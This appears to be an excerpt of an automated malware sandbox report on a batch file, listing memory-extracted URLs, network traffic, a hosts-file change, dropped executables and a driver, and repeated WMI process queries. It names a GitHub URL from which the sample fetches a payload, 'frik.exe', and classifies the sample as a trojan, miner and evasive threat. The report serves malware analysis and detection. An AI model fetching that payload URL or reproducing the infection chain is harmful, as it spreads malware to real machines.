Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: powershell.exe, 00000003.00000002.1542373154.000002570160E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.com
Source: powershell.exe, 00000003.00000002.1542373154.00000257018D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.000002571006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.co
Source: powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.cod
Source: powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.coductVersion124
Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000003.00000002.1542373154.0000025700231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1542373154.000002570164A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000003.00000002.1542373154.0000025700001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1542373154.000002570171B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.1542373154.0000025700231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000003.00000002.1542373154.0000025700001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1542373154.0000025701347000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: powershell.exe, 00000003.00000002.1564853812.000002576D6DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: powershell.exe, 00000003.00000002.1542373154.0000025700231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1542373154.0000025700001000.00000004.00000800.00020000.00000000.sdmp, 1348.exe, 00000006.00000002.1636734357.000002007EDD0000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000B.00000002.1624151013.0000024B91570000.00000004.00000020.00020000.00000000.sdmp, wusa.exe, 0000000E.00000002.1624513920.000002844E6D9000.00000004.00000020.00020000.00000000.sdmp, wusa.exe, 0000000E.00000002.1624575403.000002844E8C0000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000F.00000002.1625790130.0000017F0BD90000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000011.00000002.1626671311.00000166BE740000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000013.00000002.1628425902.000001EFDC190000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000015.00000002.1629566182.000001603B750000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000017.00000002.1631470448.0000029B1BBD0000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000019.00000002.1632666952.0000012BA8A10000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000001B.00000002.1644264384.00000271AB210000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000001C.00000002.1671409015.000001DA1CD00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe
Source: sc.exe, 0000001C.00000002.1671409015.000001DA1CD00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGP
Source: wusa.exe, 0000000E.00000002.1624575403.000002844E8C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/fruktoozik/qnfr/rawf
Source: wusa.exe, 0000000E.00000002.1624513920.000002844E6D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/fruktoozik/qnfr8P
Source: powershell.exe, 00000003.00000002.1542373154.0000025700C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1542373154.00000257018D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.000002571006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1542373154.000002570171B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.1542373154.000002570171B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000003.00000002.1542373154.0000025701633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000003.00000002.1542373154.0000025701633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/fruktoozik/qnfr/refs/heads/main/frik.exe
Source: 1348.exe, 00000006.00000003.1629890366.000002007ECE0000.00000004.00000001.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667557694.00000147A4500000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.drweb.ru/
Source: 1348.exe, 00000006.00000003.1629890366.000002007ECE0000.00000004.00000001.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667557694.00000147A4500000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.kaspersky.ru/downloads/free-virus-removal-tool

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.9:49707 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\1348.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\1348.exe

Jump to dropped file

Source: C:\Windows\System32\conhost.exe

Code function: 47_2_0000000140001394 NtDelayExecution,

47_2_0000000140001394

Source: C:\ProgramData\Chrome.exe

File created: C:\Windows\TEMP\lhaqmlexwhjs.sys

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_0smp4f3y.ej3.ps1

Source: C:\Windows\System32\conhost.exe	Code function: 47_2_0000000140003240		47_2_0000000140003240
Source: C:\Windows\System32\conhost.exe	Code function: 47_2_00000001400027D0		47_2_00000001400027D0

Source: Joe Sandbox View

Dropped File: C:\Windows\Temp\lhaqmlexwhjs.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: classification engine

Classification label: mal100.troj.adwa.expl.evad.mine.winBAT@70/18@4/4

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2728:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzu3hwdv.fdf.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" "

Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\explorer.exe
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\explorer.exe			Jump to behavior

Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
